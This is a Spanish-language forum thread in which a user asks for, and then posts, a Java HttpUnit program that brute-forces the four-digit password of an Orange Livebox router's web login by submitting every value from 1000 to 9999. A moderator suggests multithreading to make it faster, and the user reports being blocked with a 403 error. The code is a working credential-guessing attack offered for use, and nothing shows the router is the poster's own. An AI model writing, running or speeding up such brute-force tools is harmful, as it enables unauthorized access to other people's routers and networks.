elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  Java
| | | |-+  Bot para iterar contraseñas en un rango de 4 digitos
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Bot para iterar contraseñas en un rango de 4 digitos  (Leído 3,152 veces)
sergiorey

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Bot para iterar contraseñas en un rango de 4 digitos
« en: 21 Marzo 2017, 19:31 pm »

Hola, soy nuevo en el foro.
Necesito un programa/script/bot o como quieras llamarlo para que itere 10000 veces para acceder al livebox del router(orange). El usuario no hace falta, y el password se que es de 4 dígitos. Estaria eternamente agradecido si alguien me echa un cable. Se programacion en java pero no se como vincularlo con html. No importa si es en otro lenguaje.





Acabo de hacer un pequeño programa muy cutre en java usando HttpUnit y parece que funciona, aunque el problema es que itera bastante lento, es decir por segundo.
Empiezo por 1000 por que no me quiero comer la cabeza
Darme alguna opinion al respecto, gracias.


Código
  1. public class Prueva {
  2. public static void main(String[] args) throws IOException, SAXException, InterruptedException {
  3.  WebConversation wc = new WebConversation();
  4.  WebResponse   resp = wc.getResponse( "http://192.168.1.1" ); // read this page
  5.  String url = "http://192.168.1.1/loginpserr.stm";
  6.  WebForm form = resp.getForms()[1];      // select the second form in the page
  7.  
  8.  for (int i = 1000; i < 10000; i++) {
  9.   form.setParameter("pws", String.valueOf(i));
  10.   form.submit();
  11.   System.out.println(i);
  12.   if(!url.toString().equals(wc.getCurrentPage().getURL().toString())){
  13.    System.out.println(i+ " es la clave correcta!!!! ENHORABUENA!");
  14.    break;
  15.   }
  16.  }
  17. }
  18. }


· No hagas doble post
>aquí las reglas del foro
-Engel Lex


« Última modificación: 22 Marzo 2017, 01:43 am por sergiorey » En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: Bot para iterar contraseñas en un rango de 4 digitos
« Respuesta #1 en: 22 Marzo 2017, 01:19 am »

usa multihilo, tirás tanto threads como soporte el pobre aparato y harás el procesos cientos de veces más rapido


En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
sergiorey

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: Bot para iterar contraseñas en un rango de 4 digitos
« Respuesta #2 en: 22 Marzo 2017, 01:33 am »

Tienes razón, gracias y perdón por la novatada  :-[
Vale, se me ha quedado en 1890 y ahora me lanza este error

Error on HTTP request: 403 Forbidden [http://192.168.1.1]
« Última modificación: 22 Marzo 2017, 01:47 am por sergiorey » En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: Bot para iterar contraseñas en un rango de 4 digitos
« Respuesta #3 en: 22 Marzo 2017, 01:45 am »

te bloqueó XD forbidden = prohibido... probablemente tiene alguna detección de intentos... o simplemente fueron tantos que se bloqueó el servidor interno
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
sergiorey

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: Bot para iterar contraseñas en un rango de 4 digitos
« Respuesta #4 en: 22 Marzo 2017, 01:54 am »

te bloqueó XD forbidden = prohibido... probablemente tiene alguna detección de intentos... o simplemente fueron tantos que se bloqueó el servidor interno
Parece ser eso, aunque desde el navegador web en teoria me deja
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines